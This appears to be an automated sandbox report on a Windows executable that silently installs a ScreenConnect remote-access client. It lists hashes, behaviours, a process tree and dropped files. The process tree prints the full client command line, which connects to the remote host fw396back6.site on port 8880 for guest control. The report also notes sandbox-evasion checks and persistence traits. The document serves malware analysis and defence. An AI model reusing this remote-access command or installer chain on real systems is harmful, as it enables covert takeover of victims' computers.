Analysis

  • max time kernel
    94s
  • max time network
    95s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-11-2024 22:38

General

  • Target

    1c7dfc929d8e92aee949babc920e7994de5ef98eb9977e668f51406abed2de94N.exe

  • Size

    5.2MB

  • MD5

    dbd8e0fb9ecd8bb7d275c66d650066f0

  • SHA1

    c75890c60f4faaba669260cbad018ed8b2381e31

  • SHA256

    1c7dfc929d8e92aee949babc920e7994de5ef98eb9977e668f51406abed2de94

  • SHA512

    148b5a41180c48f458beba22d0f20cf76136ab2ad0622a957ff2c771d8bbfe9190a2fd95f2d47f0e7e0d9ae9ba9eb73014d0e5545c5ef7545e7e1219424c93aa

  • SSDEEP

    98304:yps6efPfBOPvLtabi4X0MV+dYdcGt7VIb4:0fefPJws3V+a

Malware Config

Signatures

  • Sets service image path in registry 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 3 IoCs
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Drops file in Program Files directory 19 IoCs
  • Drops file in Windows directory 13 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 20 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 37 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\1c7dfc929d8e92aee949babc920e7994de5ef98eb9977e668f51406abed2de94N.exe
    "C:\Users\Admin\AppData\Local\Temp\1c7dfc929d8e92aee949babc920e7994de5ef98eb9977e668f51406abed2de94N.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2360
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\6ee41f91e0356b36\setup.msi"
      2⤵
      • Enumerates connected drives
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:2112
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4448
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding C6901ADE64AD6F74D4B0DEF3BBBADA31 C
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1684
      • C:\Windows\SysWOW64\rundll32.exe
        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI8405.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240616609 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:4824
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
        PID:4716
      • C:\Windows\syswow64\MsiExec.exe
        C:\Windows\syswow64\MsiExec.exe -Embedding 09BC42887BE19CAA49DC7780B4767A33
        2⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:3724
      • C:\Windows\syswow64\MsiExec.exe
        C:\Windows\syswow64\MsiExec.exe -Embedding 801578B906ADD6B06E279E5CC639EE64 E Global\MSI0000
        2⤵
        • Drops file in Windows directory
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:4684
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Checks SCSI registry key(s)
      PID:1952
    • C:\Program Files (x86)\ScreenConnect Client (6ee41f91e0356b36)\ScreenConnect.ClientService.exe
      "C:\Program Files (x86)\ScreenConnect Client (6ee41f91e0356b36)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=fw396back6.site&p=8880&s=c972fd69-044f-44de-bd7a-ba30c3a4dd4d&k=BgIAAACkAABSU0ExAAgAAAEAAQAh9bOsei5K5vIJDnPhKls%2biGM39asuRHfnvVllACipdmLgWh32OGpscJN79La1W4aR8OMfoKYaOS3v5ZGE32ciouAfxFBwCbiQs0x7sHJp3sbNmvVKC7QPIpogrcDpbCEn%2f4VAMqbkbUoE%2bPnhjHFiuGHGL%2b%2fsr8ScxspCAy6iRK2rijP1eK%2bfZ%2f8OmtIxNHfw3iiTATFowZ8X%2bb9i%2fnTIOljL%2fqYjPRq4WRBkIWbBgo2NkKHdWcXSlw38SiA%2bZ5qO4Z2VvuJoTH5DS%2fgrJ3peABETazbJLEr8cKYx0emj39NjikGEbb%2fXjjiAr5k7ew%2bAGSVqKCPJnRwFcfUwwqml&t=Special&c=&c=Beanie&c=NewMoble&c=&c=&c=&c=&c="
      1⤵
      • Sets service image path in registry
      • Drops file in System32 directory
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2848
      • C:\Program Files (x86)\ScreenConnect Client (6ee41f91e0356b36)\ScreenConnect.WindowsClient.exe
        "C:\Program Files (x86)\ScreenConnect Client (6ee41f91e0356b36)\ScreenConnect.WindowsClient.exe" "RunRole" "48332910-a2e4-495b-a48d-c100a4bd0661" "User"
        2⤵
        • Executes dropped EXE
        • Suspicious behavior: AddClipboardFormatListener
        PID:2044
      • C:\Program Files (x86)\ScreenConnect Client (6ee41f91e0356b36)\ScreenConnect.WindowsClient.exe
        "C:\Program Files (x86)\ScreenConnect Client (6ee41f91e0356b36)\ScreenConnect.WindowsClient.exe" "RunRole" "1352fc84-44d4-4fa3-a6ed-144722a82be8" "System"
        2⤵
        • Drops file in System32 directory
        • Executes dropped EXE
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Suspicious behavior: AddClipboardFormatListener
        PID:2088

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Config.Msi\e57bae5.rbs

      Filesize

      213KB

      MD5

      9463ad78a64831e67e68504403cd5677

      SHA1

      ed871e83609ce6ba9a55925a0150809837fb6cd9

      SHA256

      bd7f9450e933e90f9a95a7bff2bc0031a7901ae519ac014a854ed258ccdc6598

      SHA512

      264a5093e3063b47ab3272a4e0aea24d1c451547efc98d45525638b4087d48c61ba4f79e8efcb9aa051733ceb38d2564df1c8eebe4205e4fc6af3055b9c1391f

    • C:\Program Files (x86)\ScreenConnect Client (6ee41f91e0356b36)\Client.Override.en-US.resources

      Filesize

      762B

      MD5

      b09dfe9fef5bdad50aed0c5c81a7f8b8

      SHA1

      0fe2acb83a8d66156e3f8afe10963c3878a9c8d4

      SHA256

      39a6456f828160e9f1d49df496143a3d83401478b0b9dfd18b66d1f44628aa73

      SHA512

      c5709d3cb1379acccff12a19ca42b3b696f2266aa94792b011acd7658eb319c8ef6df5019f83d8759f1e19db9d4492582794739c185bd691d7c84493f7390bfb

    • C:\Program Files (x86)\ScreenConnect Client (6ee41f91e0356b36)\Client.Override.resources

      Filesize

      17KB

      MD5

      1a9ce086dc257d884e31d884d8c138f1

      SHA1

      83de5729eb3e524986f18f5144490fd2de9a8377

      SHA256

      8d0d89b5cbcbfc3c4eac7b05ec6a4eb018388e8022d033524b6317bb53c8d56f

      SHA512

      8ca7783af9c4c143178587ac0b6928d6d7e37f8b4b2176a34bb4f76415f492286736b2ae8d8e555bb3cefc103fe816d98fa1296d6bf8ddc094f6ab0d6c85f2d1

    • C:\Program Files (x86)\ScreenConnect Client (6ee41f91e0356b36)\Client.en-US.resources

      Filesize

      47KB

      MD5

      3e83a3aa62c5ff54ed98e27b3fbecf90

      SHA1

      96d8927c870a74a478864240b3ace94ad543dfb8

      SHA256

      2d88b97d28be01abca4544c6381a4370c1a1ce05142c176742f13b44889ddf90

      SHA512

      ea9d05a4aa1ee5cccc61c4f5e8994efba9efff0549b69577bef1f2a22cce908739124eff1e0db5cfdd69e077ad2d7cdb1307de92d79673c9309ee621cb139956

    • C:\Program Files (x86)\ScreenConnect Client (6ee41f91e0356b36)\Client.resources

      Filesize

      26KB

      MD5

      5cd580b22da0c33ec6730b10a6c74932

      SHA1

      0b6bded7936178d80841b289769c6ff0c8eead2d

      SHA256

      de185ee5d433e6cfbb2e5fcc903dbd60cc833a3ca5299f2862b253a41e7aa08c

      SHA512

      c2494533b26128fbf8149f7d20257d78d258abffb30e4e595cb9c6a742f00f1bf31b1ee202d4184661b98793b9909038cf03c04b563ce4eca1e2ee2dec3bf787

    • C:\Program Files (x86)\ScreenConnect Client (6ee41f91e0356b36)\ScreenConnect.Client.dll

      Filesize

      188KB

      MD5

      6bc9611d5b6cee698149a18d986547a8

      SHA1

      f36ab74e4e502fdaf81e101836b94c91d80cb8ea

      SHA256

      17377a52eeae11e8ee01eb629d6a60c10015ad2bb8bc9768e5c8e4b6500a15ed

      SHA512

      3f23670d0ba150de19a805db6beb6eed8538bbad6fbe3cc21d17d738a43cf411c679a23cea11549e69be0321e672f740791d40e92498aef9d1f8650743ee85ea

    • C:\Program Files (x86)\ScreenConnect Client (6ee41f91e0356b36)\ScreenConnect.ClientService.dll

      Filesize

      60KB

      MD5

      22af3a23bd30484514cdacf67c5b3810

      SHA1

      e92a4eaee9d896964de541ce2f01c2404b638258

      SHA256

      7c5442121dba2a30ab9579ec08e111ded372cf9cf90fb3256f273980b975afa9

      SHA512

      95e40b27e90fce7ca85e76afbbc16eb62b4bb977664702b987de2eb2294e6fe9e6df5610ec7b2362c2c68493313f30fbbcbd3446dbe8ae2fa47b89407f5d5936

    • C:\Program Files (x86)\ScreenConnect Client (6ee41f91e0356b36)\ScreenConnect.ClientService.exe

      Filesize

      93KB

      MD5

      dc615e9d8ec81cbf2e2452516373e5a0

      SHA1

      ec83d37a4f45caeb07b1605324d0315f959452e9

      SHA256

      e9ab064ed381c29a3930f75ca3e05605c6ee07f30a69c043f576a5461de3bafc

      SHA512

      82fe00447fb9785264dfb8032399adf6d33d91d71058212d252742c9e5fd54f5a52f6baf4fb05e95f9a4055057c60a33a7c1c642f18a6a4e045b49be88fa5d9f

    • C:\Program Files (x86)\ScreenConnect Client (6ee41f91e0356b36)\ScreenConnect.Windows.dll

      Filesize

      1.6MB

      MD5

      29454a0cb83f28c24805e9a70e53444a

      SHA1

      334202965b07ab69f08b16fed0ee6c7274463556

      SHA256

      998cc3f9af5bd41ccf0f9be86192bbe20cdec08a6ff73c1199e1364195a83e14

      SHA512

      62790920974a2f1b018d466ae3e3b5100006a3c8013f43bdb04af7074cfe5d992caaeb610de2b1b72ff0e4acf8762db1513a4a0cf331f9a340ae0ce53c3be895

    • C:\Program Files (x86)\ScreenConnect Client (6ee41f91e0356b36)\ScreenConnect.WindowsClient.exe

      Filesize

      573KB

      MD5

      5dec65c4047de914c78816b8663e3602

      SHA1

      8807695ee8345e37efec43cbc0874277ed9b0a66

      SHA256

      71602f6b0b27c8b7d8ad624248e6126970939effde785ec913ace19052e9960e

      SHA512

      27b5dcb5b0aeadf246b91a173d06e5e8d6cf2cd19d86ca358e0a85b84cd9d8f2b26372ef34c3d427f57803d90f2e97cf59692c80c268a71865f08fc0e7ce42d1

    • C:\Program Files (x86)\ScreenConnect Client (6ee41f91e0356b36)\ScreenConnect.WindowsClient.exe.config

      Filesize

      266B

      MD5

      728175e20ffbceb46760bb5e1112f38b

      SHA1

      2421add1f3c9c5ed9c80b339881d08ab10b340e3

      SHA256

      87c640d3184c17d3b446a72d5f13d643a774b4ecc7afbedfd4e8da7795ea8077

      SHA512

      fb9b57f4e6c04537e8fdb7cc367743c51bf2a0ad4c3c70dddab4ea0cf9ff42d5aeb9d591125e7331374f8201cebf8d0293ad934c667c1394dc63ce96933124e7

    • C:\Program Files (x86)\ScreenConnect Client (6ee41f91e0356b36)\ScreenConnect.WindowsCredentialProvider.dll

      Filesize

      746KB

      MD5

      f01a59c5cf7ec437097d414d7c6d59c4

      SHA1

      9ea1c3fbf3b5adbe5a23578dea3b511d44e6a2dd

      SHA256

      62b405f32a43da0c8e8ed14a58ec7b9b4422b154bfd4aed4f9be5de0bc6eb5e8

      SHA512

      587748ad4dd18677a3b7943eab1c0f8e77fe50a45e17266ba9a0e1363eda0ff1eabcf11884a5d608e23baf86af8f011db745ad06bcdecdfd01c20430745fe4bb

    • C:\Program Files (x86)\ScreenConnect Client (6ee41f91e0356b36)\app.config

      Filesize

      3KB

      MD5

      c1b856b986497097b9c303b83bffbcb7

      SHA1

      619ee7b90bbf8629f627461016c0183252bfe849

      SHA256

      660a168c69aaf009973494325d72d1b3ae19b1ba80490528b6aac232a693dac5

      SHA512

      46d5b11da4f5c1485194f585dcb76a6c29b9459baaae506f1869530084d59dc0c6bdff8af80ae78d81c5b01e3f043b5694782ff6b37cd0fccc80980f906622e3

    • C:\Program Files (x86)\ScreenConnect Client (6ee41f91e0356b36)\system.config

      Filesize

      949B

      MD5

      bf1bec6547f8cfbafb716f05782a5791

      SHA1

      ec08d67c4e5a765e259254ef4ae80dc75f7eafbc

      SHA256

      e3728185c9c1d00ef9391bad4a977c142edd97d41c9745e1d4519a4b433cdf94

      SHA512

      65e5802599db1a8e784aafb853cd95e9e3def66fa9d91b0c8d6d8599d2a5e5d876b9d50b3a3fd2f6f849e13b6c124f38c3511c97d2e276d8c3b05b28f6c559c9

    • C:\Users\Admin\AppData\Local\Temp\MSI8405.tmp

      Filesize

      1017KB

      MD5

      8d94c9f4c07b76b4e32daffcc51109da

      SHA1

      62e31a89c488d6745abb72a3071f688fd6180d33

      SHA256

      2b35c0e4088b2a7728fa7bc6a5bfdefed7665598de6d49641fdf5d1f1271a4d7

      SHA512

      0092cbbd95777e6931864d61931efdf3a349f79c575030cad9a1771432f52e1bdc25d5640e2923d202c42c2ce242d00187486334a946e97319d48211233eb0ac

    • C:\Users\Admin\AppData\Local\Temp\MSI8405.tmp-\Microsoft.Deployment.WindowsInstaller.dll

      Filesize

      172KB

      MD5

      5ef88919012e4a3d8a1e2955dc8c8d81

      SHA1

      c0cfb830b8f1d990e3836e0bcc786e7972c9ed62

      SHA256

      3e54286e348ebd3d70eaed8174cca500455c3e098cdd1fccb167bc43d93db29d

      SHA512

      4544565b7d69761f9b4532cc85e7c654e591b2264eb8da28e60a058151030b53a99d1b2833f11bfc8acc837eecc44a7d0dbd8bc7af97fc0e0f4938c43f9c2684

    • C:\Users\Admin\AppData\Local\Temp\MSI8405.tmp-\ScreenConnect.Core.dll

      Filesize

      519KB

      MD5

      b319407e807be1a49e366f7f8ea7ee2a

      SHA1

      b12197a877fb7e33b1cb5ba11b0da5ca706581ba

      SHA256

      761b7e50baa229e8afcd9a50990d7f776ddb5ed1ea5fbb131c802e57cf918742

      SHA512

      dc497643790dc608dece9c8fe7264efedd13724bd24c9bf28a60d848b405fddefb8337a60f3f32bb91518910e02c7a2aaf29fc32f86a464dfcafa365526bdb7f

    • C:\Users\Admin\AppData\Local\Temp\MSI8405.tmp-\ScreenConnect.InstallerActions.dll

      Filesize

      21KB

      MD5

      b0585159161d50e330b7f8eda50a2770

      SHA1

      8636fab3ce6c21a42d3e5fbd495c2ddad4279162

      SHA256

      ca9e51d51f24e16428d1b0e9a0829a44da2678bfc7ba00f0b46a57dcd6d734b8

      SHA512

      e9ae99bdce64ca4282fa4580d3b081f7d0874c756aef77fb58e10db148e2f670ba48667ce62033c6f514ff825dc54c1bdbae2c7f8d5f9355486402cf75e1d5ad

    • C:\Users\Admin\AppData\Local\Temp\ScreenConnect\6ee41f91e0356b36\setup.msi

      Filesize

      13.5MB

      MD5

      3240b7e3cbb4e8fe5bc174d9d1ad5d12

      SHA1

      c063e09e6bf4b8e43d7ed7f0b110234d7c6abc46

      SHA256

      bcd06b1e0bd0ac449ba96cdd23e249372035b6707a4c5c8343525ac1256c00f8

      SHA512

      00f319511194f0fbeb0fa6c48de6a5f734b7847af03d389b4fdd57374dc8d56f6f01838e17c7dc3fd7c780a2896861525e13e0b0eb0cc96b5d1be07f7bc965fd

    • C:\Windows\Installer\MSIBC4C.tmp

      Filesize

      202KB

      MD5

      ba84dd4e0c1408828ccc1de09f585eda

      SHA1

      e8e10065d479f8f591b9885ea8487bc673301298

      SHA256

      3cff4ac91288a0ff0c13278e73b282a64e83d089c5a61a45d483194ab336b852

      SHA512

      7a38418f6ee8dbc66fab2cd5ad8e033e761912efc465daa484858d451da4b8576079fe90fd3b6640410edc8b3cac31c57719898134f246f4000d60a252d88290

    • \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

      Filesize

      24.1MB

      MD5

      ff3d359426f6b5519f94b2f175e1298f

      SHA1

      e59fe7a92ef7d066ae0f8323cf05aeaa011a5cda

      SHA256

      daa30e3500ee8eb5030e4cff862750e21e4ae2de0346b53f38a96763d14104cf

      SHA512

      9f5650b9566626ddbd3564bb8a14960b4c5c3cf6990cbadc085179e097b1b2642222ab0dfe470fd1ecad35444890bb50ae59b4d7caa356dfd40aa5f98b5ff3d1

    • \??\Volume{ff55cfe6-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{763b55cc-21a8-4574-bc77-e029dff3a1c2}_OnDiskSnapshotProp

      Filesize

      6KB

      MD5

      ed0b1cfbe7689d446bfecfafe27823c4

      SHA1

      979298466930dfcc599823b4ff9a7b41ac970d9b

      SHA256

      f890c56e2bc96b1929a62c560a8f97e46b4f5284988e7c57f9dbff1a24aaf20e

      SHA512

      794198678d87b0297ff28d15493729214756d73e2bc035212c8ad862af79aff694baccdedbe7d7e45e714c18dd499afd874232c5ca6754ca73757fe03108150f

    • memory/2044-134-0x00000000003C0000-0x0000000000454000-memory.dmp

      Filesize

      592KB

    • memory/2044-135-0x0000000002750000-0x0000000002786000-memory.dmp

      Filesize

      216KB

    • memory/2044-137-0x000000001B590000-0x000000001B73A000-memory.dmp

      Filesize

      1.7MB

    • memory/2044-136-0x000000001B350000-0x000000001B3D8000-memory.dmp

      Filesize

      544KB

    • memory/2044-138-0x000000001C980000-0x000000001CB06000-memory.dmp

      Filesize

      1.5MB

    • memory/2044-141-0x0000000000D10000-0x0000000000D26000-memory.dmp

      Filesize

      88KB

    • memory/2044-142-0x0000000002710000-0x0000000002726000-memory.dmp

      Filesize

      88KB

    • memory/2360-6-0x0000000075010000-0x00000000757C0000-memory.dmp

      Filesize

      7.7MB

    • memory/2360-1-0x0000000001110000-0x0000000001118000-memory.dmp

      Filesize

      32KB

    • memory/2360-5-0x0000000004FA0000-0x0000000004FC2000-memory.dmp

      Filesize

      136KB

    • memory/2360-11-0x0000000075010000-0x00000000757C0000-memory.dmp

      Filesize

      7.7MB

    • memory/2360-8-0x0000000075010000-0x00000000757C0000-memory.dmp

      Filesize

      7.7MB

    • memory/2360-7-0x0000000075010000-0x00000000757C0000-memory.dmp

      Filesize

      7.7MB

    • memory/2360-0-0x000000007501E000-0x000000007501F000-memory.dmp

      Filesize

      4KB

    • memory/2360-4-0x0000000005020000-0x00000000050A8000-memory.dmp

      Filesize

      544KB

    • memory/2360-3-0x0000000075010000-0x00000000757C0000-memory.dmp

      Filesize

      7.7MB

    • memory/2360-2-0x0000000005300000-0x00000000055CA000-memory.dmp

      Filesize

      2.8MB

    • memory/2848-106-0x0000000004880000-0x0000000004E24000-memory.dmp

      Filesize

      5.6MB

    • memory/2848-100-0x0000000004120000-0x00000000042CA000-memory.dmp

      Filesize

      1.7MB

    • memory/2848-125-0x0000000004410000-0x00000000044CE000-memory.dmp

      Filesize

      760KB

    • memory/2848-91-0x0000000003DE0000-0x0000000003DF6000-memory.dmp

      Filesize

      88KB

    • memory/2848-118-0x0000000004050000-0x00000000040A0000-memory.dmp

      Filesize

      320KB

    • memory/2848-123-0x0000000004370000-0x0000000004402000-memory.dmp

      Filesize

      584KB

    • memory/2848-122-0x00000000040A0000-0x00000000040D6000-memory.dmp

      Filesize

      216KB

    • memory/4824-36-0x0000000004CC0000-0x0000000004D48000-memory.dmp

      Filesize

      544KB

    • memory/4824-32-0x0000000004C10000-0x0000000004C1C000-memory.dmp

      Filesize

      48KB

    • memory/4824-28-0x0000000004BD0000-0x0000000004BFE000-memory.dmp

      Filesize

      184KB